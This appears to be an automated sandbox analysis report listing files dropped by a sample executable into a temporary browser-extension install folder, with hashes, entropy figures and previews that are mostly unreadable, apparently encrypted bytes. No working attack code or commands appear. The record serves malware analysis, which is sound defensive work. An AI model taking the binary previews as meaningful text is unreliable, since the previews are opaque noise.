6E,f.....

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\vi\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1005
Entropy (8bit):	7.7278703165862215
Encrypted:	false
SSDEEP:	24:Y8jxekXltuynDZyeOw+Sd3TLuz5diiRftnUbEBQIbD:Y8t/DZyBpUL8bLfdUbEBXD
MD5:	BD16BB17C402516C66FD9F2900B37590
SHA1:	CB2310DEA5ED21EAACD7BC47E357F7BD59585A41
SHA-256:	381F3083EB2DE3D6198A53870F2B80420CAE6D14F3BF3E21C605685FBA7759FE
SHA-512:	5023806BA89B77F75823A21FD3074BC8F990779776634FFC3A6D81481F30DFABB88CD9E4674AFC3C8D0FBCB19C130576AD6000E7DC921BCD142199C8FE0146AE
Malicious:	false
Reputation:	unknown
Preview:	{"craP.&.=E ..~.DK..)!..W..(f.V...+...do.S....0....F.......uh{...@p.~9..../.0..T7t'!7...E..:_.......&G.i.J....W.p..<.A....WW4`.o.. P=<..f]......p...U....]o..lH.......>,cn.fW.sS.... .....1..k...`..i..........Z.sT.....Cf_.wo.......m.9.."..:..'...H/......:. }...C..;.WwXT.q..i....N.<...,.a.Le.8P.Q.x.St.4........_6..xD3......U....d..?W.<e...R...Y..S.s..3Y..y....IX.....!....`S@.......=.+..].B..B..$........n...f5..Tf...F.k.....k.O2.6A...n..L....,t.B..;`.$..4......<..Z...9....@.......6.&m.t...L...q.6Z.m..7.kp"b..E.S..Q..}K.....v..ZV..S.Q1'X........]..X4......Z. xO i11g(k.O.m..t'.Zj.m.....Y.j...'v.@9#.7.!."G5.......n..7o..9.._o..A.C..`....$....^..G..6...'...j..W4A.}..t}r...Fg.=fI#Y3`.BF.....E+.....L.X....~a.Pq.S.30...GO..jn.....]...4...=6..":.=..3m..0..>...yo.].`\.N4...j..O..H..1..k.S.]'...uY.G...!.w....p..z.=.1.... ...T. 3M...R...4r...$..V.EM..H...T8@.....L...^co.<..Z.n7K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\zh_CN\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	936
Entropy (8bit):	7.769084995084905
Encrypted:	false
SSDEEP:	24:Y5lHcdEJZk6j8WEzkXPGym/Wo+/tIUOruOP8hcUbD:YH0ivj8W7XPGym/Wo+/tpOPPX+D
MD5:	A2D23B967CEFEC6E4E7000A32B39E9BC
SHA1:	4BDB3D1CA1F8B655442B5D2815F11FD5C84F9448
SHA-256:	779B303E434C4ED1C82D4909D411AD0DB235487192F526B11449E87EDD54EE59
SHA-512:	153095CB9A60249287C385E01BD2304003F7971516F98911DF2E671F44E4D85D937C0655229C68C2055C52A77F453C9FF7F3D926C52B355B77BFED1BA18A8176
Malicious:	false
Reputation:	unknown
Preview:	{"cra.A.n.}J..-:s..!....hP..79.{.....1.......W.....#...y. . .........\.=.q.......u.}1?.....'..[....\.\|..f..p..V.1M.m..6...g.....T...:......d!.=......0..Z........G\|D.!...K.et......M...-.........>.Pj.. P.O.K.}N..1.g..........[.i(...w..4}.}..=..W...+....'&?AV.....X..R........{\_...../.?.\m..7..6.Z..\.8.P.y...{.5..u...a"]..CB..#.%.].........U#...}......Y..R..p)]6.!.Hr..o.. I..]..F.Q~..[...[...C.VV.....6^..,6...B.....2G2.W %..T[.B....3...=0...<=.YA.Y....Y.o..O...n)...e...wx....G.Z...&"3].m...r..'7..l.6.p..i.W..i.L...j..,..B.Q..?..`.`...v.Tu.M..;.RZ...B..V...[..N...7.8..!B.....r....3....X..o+..e.<........b..B...$.....L.......]*bJ.n......=X..4.?.8.=...)H.N...L.p..h.L..('fk.ocYAV.. d...i%.{.....!..A...>._eo.....]..>....@.A.z....W...tXH.er..3.......{p.Da_..RZ..L.k..b.5WXZ.. .[.f...Bi.yA....=].......>.....c.../YK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_locales\zh_TW\messages.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1014
Entropy (8bit):	7.762031572128484
Encrypted:	false
SSDEEP:	24:Y4+lfrz7SCUf1k0hIXuHL0JUzNdvaC3jMyLRJuCEbD:Y4OzzW1kqrfR3jJeCOD
MD5:	392F90D6C3DB1BB5C91E15D636AC4AC7
SHA1:	ABBB518D97B18AD558EDE984B224D61418C55B60
SHA-256:	0219393A9D87FC158E789A920BD467C674933965782551960B57CDDF8196D0D5
SHA-512:	BBEDC33A6C12F458966CB173464123A39E92F1D5586CE5F6562533231837174B784B496B2D87C82723EB5609291C1607F839A89F41F0E88663F7535A4912846A
Malicious:	false
Reputation:	unknown
Preview:	{"cra9.j....S!{.....m..y..z..$....#....?...Y..F._.....h:Ds".0..N....4..X&]..3.<..}..SL.-..J>8.r.".-...y...T..15../..a...B..:t}.H....]..[.7E.W...? .b.......2....}.zZ...c.f+.<`W.y..nbH..f{.t......W...L.U. ....{."..8.X.h6.<#.m...N.U..Q.:.....!.7Z^....e63....,g3. ...M.~-..G:1^\.9G...\|....I......pl.O-...O.}<.7.7.t.>..v6.O.U....\|.T+>.;.C.foc~.8Q..P...." Z.....l..C}....bQ.@.........fn......k....T)..X\..P...Ha{....p.....Eh.:<..;...'Fh,.P.@.lf. .}J.OZ..v.8..^S.x....#.8_uR.5;KJ...Eb..Z..%.v.$O....`].#......2...-.0.=MSr...ks.a{D..QV.. .....~1z...y...tc..._fX..<.N.DR..>...Z..{_X^.W^.~...~..2.[]..>l.'h~...S0.Hg.:.d.X...../..oA..n.(.r.....U..Tc.K...".......W2...k>....}BE...q...UI......".2.\|<,...%.f....a..U9.}H..aRT.^.7.&.4'..........t@...`_........F.7A$.../........+.+,.;.D......W.....5...,.e.....V..m./v..L6F..!@:.9O.F9#....g&*..T<.{....ls.......Z..8V.[.&hJ..`...3.e.R...2kZ?.-...2....oK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	8114
Entropy (8bit):	7.975171514596888
Encrypted:	false
SSDEEP:	192:McDkcOqOiVgxyprK435kiSbxlE/F+kxU2GhSOkSnQcNvhQXliAj:L4hiVsyprt5SbxCF+k6lDnQ8QXoAj
MD5:	DB421ED7E40223B1CEDD976358D33F76
SHA1:	2C27CF7C86EDFE1797D4FD88E1456650606A710A
SHA-256:	5E9991C5331063357FC52A174E726CB5DA4B67F74CF762C30D6E92D21AA3ABF2
SHA-512:	5EAF5333B8E9A0D336B2F733AC9A025812279278DDE71D9B949BE7FE2DDCB2A79284D9B74C704749573DE7E25FB9314197C9B94238B238F7857F99F2AC715315
Malicious:	false
Reputation:	unknown
Preview:	[{"de.w....Y...PX...,..\q4.SB.#.@.~:....:.@.7.....-J..y......F......H....%..&...80..G..Jx....F.e..... ...........FeR.>..\_..o...M.@-]..........7.3.(mD.......F..k.pO.&)Q.J.t.y.y..,.#...F.v.yPTQn..%...m0.k...g....z......Ok...o.f.U...&.7......`.A^..\|...E3e...0.,.I-..B...N.`.M.?..W%h.Q/..{x.#C.h#!.eV.-..+...=Fl/..2.......)......`..4.Dh...,#....U<..D..n3tn.+..a..T..s.,YH{;.`1.....\|]{K.\.......Q.K.u."a....d.....{.o...GR...B.y.j...\|.b)ml...m.".. ..&.SpYd.E..p.......G...`..:...R..a..F.).[..O...1p~1.{~T.....]S....h.@..............r.>..awb..G..f..D).$..:.f.....KL........&.>.....J.VX.+J.W..~.S.{20B.I.}..C.+.....,.....BQ:..b.d...J..1..I..,ra.].#..}..S.?v>..S.X!.Z..Z.&...-.(...X..Gsg=....$j.h6..@..0..R.M...n.....H...>...[...........%S]..)vr.R.j.k.RYI..F..._!......#.#.=$.v. 7..H.9....B.#..b.E.3\........E......O;..:.&".=..j.106...+*7.e..P.Bj.I..{.?.u(yMEG,fS..P.T...4P....$1.....S"...od......S..+:....O.B$.0(.k...(.G./.\|By.z.#......R....QQ....2.z.J&Z.~u...

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\craw_background.js

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	544977
Entropy (8bit):	6.603214894710362
Encrypted:	false
SSDEEP:	6144:dPYdsEmv2gZ3kgyH/igQRXqbe5Dq31IVlMqX+wd5/CcMMJcRULt0NjyTOEzZQ+hp:dPERmvf3uH/56
MD5:	B6BE7456078999DC561D3D5CF907FDAE
SHA1:	AECD4FC6AE11A17D3455F2CB202CBCD9C5235E36
SHA-256:	8B705110339E02D7A502BF13E5EEFDA67E166B0814CC4260506B0744EC93C34D
SHA-512:	5306D8332A6D76C3F7E3059D85419356BFB590066340D2C5C415DE8C6FCE9D59ABCFB43B05E98106AD1FC4A987377948BD9DC71E683FD889CBF837603495BE6E
Malicious:	false
Reputation:	unknown
Preview:	/.. H....F.O..\|g.-..ad....D.u...1TJt....)......{....`.D0A.&.....k1\|.......y2.@....$..4.dp.....F.w... M+E./.m.F0Q.m.....W...%{j.....+J....\....,.v...`.6....1:.y..la.e.F?D.-.....a4yN.m.KM......8......9l1...c.[....}!..8....;..r....\..".-.m...J.C.."...N.y.4.6..v&0...NX=.'zB+...+..;..B.m....M.......a^+e]z.."V......X..~%..W.m..U. X-...-@.#_u..F.K...lk]...HkA...2.....2.I..m..J.+.b..._N............t.u......L."R..%......a.....6._g..W.I.."E. ..7..k....Y.a.H<........1q.-.p.l...3....v.Z{.O~.].W9MsM.\..+P.....{.2".\|.=!....$.n........\.......e'..c.d..g....Ztl`..J...=.\|..z}..E.........D.&.......}..(....S..c.7..F...pA.m`.....4.........C/.cTZE.......4m_{.....4C7G...mJ1..{......W.6.....r.X3$^..........A.1.+.......l..F._U.@L...2............\...7..FY]~...(..z_<.v.&[.`....G..u...a..:.._..<...bs......k.?.8A....1...C.E. 7P..@..%q..S./....sfnyJ.M+..:.Y b.,9B...J,..J.T..C.q.....7Mi.:.L.^).=.\H.._..W3..X6..YAe.f.Y...y.K^....c.9.8........\|k

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\craw_window.js

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	261650
Entropy (8bit):	7.489339499451703
Encrypted:	false
SSDEEP:	6144:8ZiVkEWEXOtlCBNHthDihx9FNNsZ9Dd/cek:vVkXEX0lCB/RaFIBda
MD5:	8FB0C5E4843D1352FFC9BEF29359FC42
SHA1:	02D0FB28758CE9FE7A705E559CBD9F6616009536
SHA-256:	3839E09F301624AF0C2515A8C833C378CCC3AF4D78DAE6D705468BB6FBAEEB92
SHA-512:	B51326E5F5B4A239636020969AF21AE265C302F5A19FA9525BCBC587AA4ABE7066BA999C281A673278728D43E7041BDC88BD2C64C77A404A02CCDCAE23FC49FC
Malicious:	false
Reputation:	unknown
Preview:	/.. L..\|Zd.X..../._...........]`....x....dz...f..C.#.o".....q.m...s.{k).iK$"...O..k..I},...g..T]f1..r.!.>.".}~...N.Z..:.m...\|."....$YD..U?.5..Eb.$&..Ow..g#.v.B.......i..(.d...Z..p.......^ 3T.cF.<.....m...H.. ...n..b...,....S.....!........^ktj..R^.A^.r...j/.6.z.1x.<Z..$._..fGp3........>..s..A....k25..0a.=..\..F4.b.xD.U.O5.....&6..np}.'.F....\.k.S.@...BT#....b3.i@....t...].S8....c.N....Y.l.VW.e6..dqW..."..{..&........#^.A.8..S&P.."..w.x.o.....+.u.%.g.#......l..+.....Z....._...M&.f.....G....s"W,4....RX....R..6.e..{.{'fS...K&..`..sC!:.....s..0,.>..a...@z..eB.Pe..._p>.:.np.~.;..G...X.!..`b0.N`^?K........s..H......Dr.a..3.......].e.v>'_...O.^\.LP......7LAb..f.=.[...!.....a.C.7@A]kZ&y..K.Q<.8..\1S..Q...X.( ....X93....:.m..W...N.e...$.X+...>U..$_..Ad.F..]....%}..".........m.x.....<...Bmy...8......g....G..h?..iH.U.u..]./O.. ....X&$......*J.}Q...jK.3D.6v/..>2+.m.3......w.(.oa.73.zn.J..k.o.mnS..Q....y.I..m.....dr..Rw.?.....l..9.ij,FA.c..\|.h.U.;..N/.

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\css\craw_window.css

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	2075
Entropy (8bit):	7.896271235345941
Encrypted:	false
SSDEEP:	48:DYYjVRM3Ogf5n7xcj6/Nqpvx4YP79TaSxYOA5Q3D:cYjjM3Ogf0KKxlPpuuYZQz
MD5:	83A2CB3319D147A129042F0EB494F824
SHA1:	9AAD0F14B7E3CE2794DA4230811EBCC5883C2EC0
SHA-256:	2AC0A94474BFE35EDA1610E688DE450B3693CBAD5CCEBD2D8BCE229B0EF36C4A
SHA-512:	EB21AA406CE3B08ED472EADFDBF29CD36C58C54F9239395ADA614D714B0A1CE8B23C7B3CAD07CA09D5A2972E1A63F5B7216A8514325B77B22B9A8873A5AE63B1
Malicious:	false
Reputation:	unknown
Preview:	html,+P...0E...W%..,.t.0.'&.Q.c....^S.....lhM}S4XT)....p.......uv>.%=..Z.3.:Fl8.~..S.E.....\|a.G..\.......L.i&...Z0.:8....S....D..K]C. ......#..SZEP7..V.;"...../56..^.[.a..T.]D..xs43c=.a f.{,...C...G....=yi..<!.........,4#QB..1`.....k.L7."...K...v.ZQ..........SK=s....v.WH...>.Y.w%9K......V..}..F.....8..2..&.. >.Wc..Td..<.I..^.Z.._...U.u...ts...n./....).W..3.3..z......w.=~..dK\.......3..R...m.B{41.H.+..~6..6......%..4.+...\^}.....P..+...."a2^$)..f...v.....x......7.<...v.@..@}...-:2Z...{Dr..m{D.t<..=...Ch.......<..<:..B.-.>.#!$...:....-..p.Mni.B{.l....'.....s@..MCS.1M.om...(.@>...G.-.X.l D ..g...gh)..4....]C].R.)6.h.....r;..:....;..u.>..........N....u.'......kO..?..K.~..D...Rr3./.....e..E......[n...9(...z.3d .....X.......0Y....n...F.(H._~[.Y..o...M!..(...ah'...&.).x...#....q..^.<...........q..d....ka...g.>.....0C......y'9s...8.....^N4%.Q.O>.%..N....q..0....1.k..9..k..8...+..~WE...w....X..m..O..s&x.L..l#.^Zb....}...x.&...Yy0....Te6....+...

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\html\craw_window.html

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1144
Entropy (8bit):	7.849280759398479
Encrypted:	false
SSDEEP:	24:Nm81p1FzCT/3QyjDBf5Y2dDoQBXSjMV/xaKr+A+D6Hs1HbD:Nr1183QyXJDoQ2MVpaKCaHsBD
MD5:	C0DA09F1D8CE3C480925C98300E6744E
SHA1:	40C2762D583339292B37E8C375CCDBA66814BDE7
SHA-256:	BAAF5494B81583F435B58D243A12BA7A5082EE5917BBEA808138D50A983E7521
SHA-512:	83F42A08F5CD8854AD5DD0CBE50AC9EA4CE519B5236A1201D31AC3439907FB746DDB6BA20113B8FEEDB5ED1D088B45B5F18686D1C21AB5BEF4F58A1DD9DF2744
Malicious:	false
Reputation:	unknown
Preview:	<!DOC.b..y.G..?....\-yE{.........J....`&..D..I>....A8.).EjU..}....SN.7C..Ht{Tzu...../..y....k....$.+Zt`...6..TV....w.a{.%.cC,u...R.X.]6...b..l.......{2.Z.t.....r.D....3(.....~....... .j.x.".^.G).x.M.G....h.m2$.#'..6......su0. <..~.4j-.\.....tv..\..I.8..A....G.^<gI%.e.....y......);.Z0.......9..$U......<...{x.B......\...2hq..4"..../...Bw....]I.......:{..m..}.Y..H..@[=\....mD..Ov..,..N\|.]...P.i..u..\|..z........5W/......:.........<....6..!+.C.ORfY.0.HG\H#n...t.-.rc..2.#{qiU>..+..X....D..p.}E.......p.....W.`5....f ..,....?.^2.m....A@1.Q.....D....o.B.)w.M2D.M..b.D.7..f,..Z."..-:..t..........{.Z..V..q...._.Q.d....t..iZ..d.........%....8.F.u..... ._6.3..7.(O..wK.e..n..f..).k}^9.?...lE..L....,..}....P..ExWy..gB..;..nB.8s.7L.~.!....!X..".....jJ<.4)....^]M.iJ.....z!.......0.b..@.4=kbI.-..VK...(..[.G....u.^.WD.3/q".-.w..OH...%..Z..$l...x..t......Y...pE.....a....C%.k...{.A...h. .1....A.j........Zjd2D#..o.&..[Q.f..]s.5..a#.b.

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\images\flapper.gif

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	GIF image data 14588
Category:	dropped
Size (bytes):	70698
Entropy (8bit):	7.997094777169321
Encrypted:	true
SSDEEP:	1536:Tndbr11Oamz0nRHxOytbxKnzE2zTGGyulFIYs36qjHGPA:Td311vnJxOytsE2ZyuDIfqq0A
MD5:	DE3E64FBDE3EB701BED6CCCFE4ED4084
SHA1:	E06723706BF992D7649D3CC9D889558DEC6F86BA
SHA-256:	A98932A77D120920E593D0A8755C4A36AFBE2DB040B996E1A81432B81B4B3552
SHA-512:	9E59ED99093BFC975A3113F15BA7AA8E94015811742ADD1613FBBC1006B246D0DCB019D21AF38D90C26BB761E3294912959E965CA9F9F1A7D86FAEF8147C9BB6
Malicious:	true
Reputation:	unknown
Preview:	GIF89.K..8\|.....i,-..........o.;..Z..J.........5......i.a.A.....'v...b.T.?H.yn.........2-.>.b....'.vwi....Sk..._..mm'.. K..I.>_kh.#3$.....Onk..........<.;...u...8.,......U.4.hI.=.3.....>L.n.4....X.....7U..zB......v..j.KD....f.w...1..D.....8....H..[..R......^......dx.....3.#W......0'.+p..{... 6..r..v..].....q\|......v..M.W.5."....E.[8;...~gb..Q...M..@..S0::P.}..........r....<.it...:pWL.P]n..#t......\|...!....fF;.pA..ylX(._..i.....S......;.4...(.j#.J.........t;...!...a..W...?n.....F.=..?6.......#R .l...y....LF.n\|{.g......m......wC.....F..9x.."Y...<..%=.E.i=4>..V......H.+..5i..E..Z`-.......lv ..q[.Hb.3.... .S7...R).:......:..j..1.!...W...."-.ih.X.0..\.[..v...^t..s...q..Y.Als.4x5.X..o.K..6......Y..l^I.B.v....r.="w.VP..i.G.+='..3.f...Q.rn...5......E.....1.....V..b.....l\Rg..}x....{..-O..}.w.\|U.3....M...^.Ip.V.CBm@g7..}...1.....X.Ic ...H.o..t.4....$.n"~_@.0zu.a..f..bD]o.@O.....7...$....O....n.)'.=?.._...fz.<!.b....qj...6.'..H.!.U..zg.@

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\images\topbar_floating_button.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	494
Entropy (8bit):	7.530204114644594
Encrypted:	false
SSDEEP:	12:6g5zx03F1ThEini9BgP9P8KamvKfCr6dtcii9a:3x0Ni9K+mvOCr6/bD
MD5:	06FD15C71C06E2F9A9F2FE78BA892763
SHA1:	9A7340E85C4819ADF68EA4025426CD98CC083065
SHA-256:	1ADFD865B2F339814C4F47BEE597BA7171827458C05468EBF2A65BA4E8BDBBC1
SHA-512:	FC0EF98BB13DE213581877FDCB5307945A05F4B359EAAFBE0B80D1928CB57604C77E5A372A0FE1531F134ED34CD68240879DD36AB285EE94C098778D389FAFF9
Malicious:	false
Reputation:	unknown
Preview:	.PNG.A.~.....M....8..x..."..B...OH........ ...%6M..R....7.k@..P&.....Cek{....t... ....kA....;..D.eE%U]..Y/i8....._...M>`...k,.p...Y..`Xs......7Qmm.......z.HW.Y..4...w.m.O@..[.\|..$...%.."i.U..@.nR..,P..s...B.i.2WCbdG........V....F.+-.8.&>&..s.M.....w4...3y\..F......=......1#..K.k1}....:XS.ibi..t...........Q..z...!..b..l..0.K.:.h{.....S.....h2~.}.....?.q.w.A..P..S.<..qx..+.=.jHu\|.......k5.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\images\topbar_floating_button_close.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	586
Entropy (8bit):	7.600543958211475
Encrypted:	false
SSDEEP:	12:FMdBCw7dWjT4PI1TRaUrxdGA5v/+EScXHQZcvvRZ3H324Ff3bbpHxatcii9a:2dBN2429HrxT536cljX5fLlHWbD
MD5:	A2E733E51F0E3FBEB131EF398A0BCD7E
SHA1:	B6EF4A62CA450998FEC419E8B6AD0DBB268B432F
SHA-256:	9FEF48B1363189634BD0250ED7EEABE7BE4D21BBA1A199B7BD78BFF31FC7DF1D
SHA-512:	234C035B546A24CC7EC2DD6641F6F4490707DD4A789CA184C0BC66E707C0221B258ECD6A5F59E58561D08FB58FC6243708654DE2748FC2FFCB79860E7FB5D55D
Malicious:	false
Reputation:	unknown
Preview:	.PNG.~.lf. a..d...i...\|..dY....In..#..<.H.........N4........tZ+..e...o.......U.....y..\|X..A.>].[S..(m..-..18}eie 6.......+...,.~....5.1A.....%......".....n8...l..0{6l5-..%7v(..-.^$[k.AaxA.....E..F]GC..c.....d.%`.9...t.......{...3=...bx...S.Z(.-.]{.-.?......:..z......x.....p...3@.1.a......[.E.#...f..../ .v).8.=6.=+.[....K......w.B_(...Be@oc..o^....=.n.H.(.x.......br..H.\|.. ..R.."V../<.o...S.$.j+q.Bm..4.?..._ic....BW.....&..}b...........X..h.j.Qr.....f..-.!B.H.y.Yd...2...=h..p.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\images\topbar_floating_button_hover.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	494
Entropy (8bit):	7.482952628803922
Encrypted:	false
SSDEEP:	12:aDUiW5e3Ghz4cF4ppcaXfeCRew2xrbb0HYwFVDtcii9a:ZUGp4cFU1feK/U05bD
MD5:	7042B3DA6CA4F6E3E8E90224BA5D49CA
SHA1:	749CA7E5D2C47E15BBE2C08DDE02E22ECBD9FCFB
SHA-256:	002299F6427AB56F7B427F9263ED1250A9D5B841B62F15A72165F26A957A2218
SHA-512:	C1097B4B13FBC797F428EF892FD23E4A7D454F414ED58ABE934F53E982ECC0138473FDE0B9CBB40BE6FB32D0AAACF7C67AAF749700B0764CEBEE95FED9E0A3A3
Malicious:	false
Reputation:	unknown
Preview:	.PNG...f....l.C2.mWN..+C&...a....G....n..^......v.,J...M..}.1._B..=.p.R...5..O^..o..<,.......).\|..J..1.a.a.....[..........C.{[\d..U..UW.F=.....z!k5....'...X;?.W...M.>O...#..z..LP.h.b...A.../Y...b.2.s......i.......P........`5..I...F>~..J....(.....~....l.0..svO.4xW....&.N.<.R...E9E...\..S1....^..~<....N..1.B..t../...<....jW.N6.`.....S.Z..V...v..1........#.H.#...t.P.<6.....I.v.qp...~Z/...q.B.DK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\images\topbar_floating_button_maximize.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	500
Entropy (8bit):	7.445903324175137
Encrypted:	false
SSDEEP:	12:o9ozIVv9eGlLom+NqUcvlL7uQEjWLGtRH/6JaLqO5Mtcii9a:o9QIV/uqUctL9ECCnH/6JaGOEbD
MD5:	F30B2641A959B7BF4A28F5E1E90D7EC8
SHA1:	20B5A5B1110875EE5A0F584039B4E94D546EFF0C
SHA-256:	518DFBC69C9785A028C00C6FD8D2E68B684238707236E02E70BE5858B5300644
SHA-512:	00E3AD6933802E80CF821C5F19F9349D71FD29A2E1628F51A92F0E47DF760465FACF3A8C773D2A06818B39E30B4583C3D33AB32659E0314C7707DD5C565FB4EF
Malicious:	false
Reputation:	unknown
Preview:	.PNG.......E..?).Vh.Z....;...v.6G..7....K{..$.1.lq...9.\|w).."..LP..,...9.5\W.....j.Q^.,\|>B.L4}3..&.".l=...q8....i.\|~.h...i..r......h...;.Y~....%GH...4$..............O[H..U........U...6.]....Ps.\..%.+.....YW..7../1.#...E?<`+Te.......VMq...5@..N.U......v..f..wQ....*.R\|)...90..b...x\|...Z..w}u.;.YYZ....]..z...U..\|.s..N.s..g..W.i.....,..\|.9.&."...^.".o]........s.wA....UF...U.g..w......e.&.$@..+...K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\images\topbar_floating_button_pressed.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	494
Entropy (8bit):	7.511404607604499
Encrypted:	false
SSDEEP:	12:wJElaPyz0dMm9tWZmj8FSKmXEuUqLkspWOMtcii9a:w3PBrWZmiqHS3bD
MD5:	059EF86DA5C0F44583AB8C8B04AAC950
SHA1:	4965C1909C0449C6F26BD34B546164D21E22182F
SHA-256:	8773007B944759DA8E22648099440FDEE6BC99766C1DFE9EB5BAB2BCF45133B9
SHA-512:	74DE71A5E758F9E8D864A8EE0AB0B741029F6853643778CF9AF82B32193D1BCDD6D5B7CDD6F6C7EF134E7352FBFDC923B43F3050124C7F7239A872956A979EC2
Malicious:	false
Reputation:	unknown
Preview:	.PNG...M...../.%/ ..../....1.......C.&.Y.'A...6..}-{..R..-B.'..#fd........2.>.Z.\|../s....p.`......+..<c.....8..U....e.x...WU..r\..x.G......L.r.....j......A.\j...D.!..7M.:.v_S...+...o.I.i(..-.o.....wY......`...$u".....@f..&C...k^.L2.......e..pg..%..ylURCUZ.....vh...&..EH?..........BQ..Mj.........c.....?_Z..y.hx..p.4..<..UZ.....y.En1H2e.>......5....i.SR.O-.WG.....Ro7y..D.J.......=F.c.A.5K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\manifest.fingerprint

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	400
Entropy (8bit):	7.335506113896774
Encrypted:	false
SSDEEP:	6:SguwM6c5iw484E2V4PVxLGG6vkRXQnoP7/q95XDlSU5Pl3NJ7HlgJGxntHcii96Z:RM6ciXV42vYXQoz84U55N9tcii9a
MD5:	4EC4F96FA263E3ED872E0C562F41CEAE
SHA1:	83834669BAB1C82C84AC00F1FD5840E61F34FC53
SHA-256:	65B8093DED4964327FAFA3C53F276789D7BA8A7ABC9633754831EB0330B4F703
SHA-512:	FB550DC801A57F19447F3BAF5AB8A44B6EB463A993048516D822BF8427908BCEF05AD61A475C209803854B52AB0A11565D0D46EC0F72FBE1CE7A6FA7E96476BA
Malicious:	false
Reputation:	unknown
Preview:	1.81e.......=.&+..6...._..1t;.1.+..t-7..t.+&.c.><..l.....[h.F$.nL..b.U..B...=...o..jn...A......R.........6.$..2/.Y.@2.7n....1c...@..v.p....UD.<.../r..9.Q.GQP.2A.k..[.......S..:\|e.r.c...E..=..)I4.*<...R...#..V....Y.J}Me...r..@.a.Q...#..=.@.Z.-.=.7....$.HoMB.....d.'.f...~.:.. f..r.sw........H....w.]..3.. ^Z.A..K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\scoped_dir4296_1252151785\CRX_INSTALL\manifest.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1758
Entropy (8bit):	7.887133582686076
Encrypted:	false
SSDEEP:	24:0hW1zyPmiiDigD0QDgdqnvEJ2Gz5v+3srN+gG9u50rKOjjdW5y9dEU0okb+bD:0hCOuii20X8v+cx+980rKO7ESY8D
MD5:	5091E812D581C81B570A6AD72FA5BF41
SHA1:	D85DFFA2D9E0A5E224BB9CCD700AE039D56638D0
SHA-256:	8D9BD4BCEF1E9485809FAB4853B87B0A61132492E2A5ACDD9ED5558A8F39D30C
SHA-512:	D100A41419D3F3E2514434802BA4DB88DAF640066DE400BCBE28ABBB6F5734D35BD2A2A9C59D03AF76F211E14FD8CE91B2ACDF065F7F446857AE5B925EA0E26E
Malicious:	false
Reputation:	unknown
